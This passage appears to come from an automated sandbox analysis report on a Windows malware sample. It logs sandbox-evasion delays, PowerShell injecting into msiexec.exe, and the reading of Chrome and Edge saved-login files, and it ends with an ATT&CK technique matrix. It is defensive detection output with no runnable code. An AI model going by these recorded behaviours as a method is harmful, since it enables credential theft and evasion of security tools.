          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599672Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599562Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599453Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599344Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599219Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599109Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598890Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598671Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598364Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598246Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598141Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598031Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597922Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597812Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597703Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597594Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597470Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597344Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597219Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597109Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596891Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596672Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596562Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596453Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596343Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596234Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596101Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595890Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595672Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595561Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595452Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595344Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595234Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595124Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595016Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594906Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594797Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594687Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594578Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594469Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594359Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7140Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2532Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4192Thread sleep time: -4611686018427385s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep count: 35 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -32281802128991695s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6244Thread sleep count: 2002 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -599891s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6244Thread sleep count: 7848 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -599781s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -599672s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -599562s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -599453s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -599344s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -599219s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -599109s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -599000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -598890s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -598781s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -598671s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -598364s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -598246s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -598141s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -598031s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -597922s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -597812s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -597703s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -597594s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -597470s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -597344s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -597219s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -597109s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -597000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -596891s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -596781s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -596672s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -596562s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -596453s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -596343s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -596234s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -596101s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -596000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -595890s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -595781s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -595672s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -595561s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -595452s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -595344s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -595234s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -595124s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -595016s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -594906s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -594797s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -594687s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -594578s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -594469s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192Thread sleep time: -594359s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeCode function: 0_2_004065DA FindFirstFileW,FindClose,0_2_004065DA
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeCode function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059A9
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599891Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599672Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599562Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599453Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599344Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599219Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599109Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598890Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598671Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598364Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598246Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598141Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598031Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597922Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597812Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597703Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597594Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597470Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597344Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597219Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597109Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596891Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596672Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596562Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596453Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596343Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596234Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596101Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595890Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595672Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595561Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595452Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595344Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595234Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595124Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595016Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594906Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594797Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594687Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594578Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594469Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594359Jump to behavior
          Source: msiexec.exe, 00000007.00000002.2760493798.0000000008DCA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeAPI call chain: ExitProcess graph end nodegraph_0-3397
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeAPI call chain: ExitProcess graph end nodegraph_0-3550
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09730000 LdrInitializeThunk,2_2_09730000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3C60000Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeCode function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000007.00000002.2772117735.00000000247B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2772117735.00000000245F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5400, type: MEMORYSTR
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000007.00000002.2772117735.00000000247B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2772117735.00000000245F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5400, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Windows Management Instrumentation
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          2
          Obfuscated Files or Information
          1
          OS Credential Dumping
          2
          File and Directory Discovery
          Remote Services1
          Archive Collected Data
          1
          Ingress Tool Transfer
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts2
          PowerShell
          Boot or Logon Initialization Scripts1
          Access Token Manipulation
          1
          Software Packing
          LSASS Memory14
          System Information Discovery
          Remote Desktop Protocol1
          Data from Local System
          21
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
          Process Injection
          1
          DLL Side-Loading
          Security Account Manager11
          Security Software Discovery
          SMB/Windows Admin Shares1
          Email Collection
          2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Masquerading
          NTDS1
          Process Discovery
          Distributed Component Object Model1
          Clipboard Data
          13
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
          Virtualization/Sandbox Evasion
          LSA Secrets21
          Virtualization/Sandbox Evasion
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Access Token Manipulation
          Cached Domain Credentials1
          Application Window Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
          Process Injection
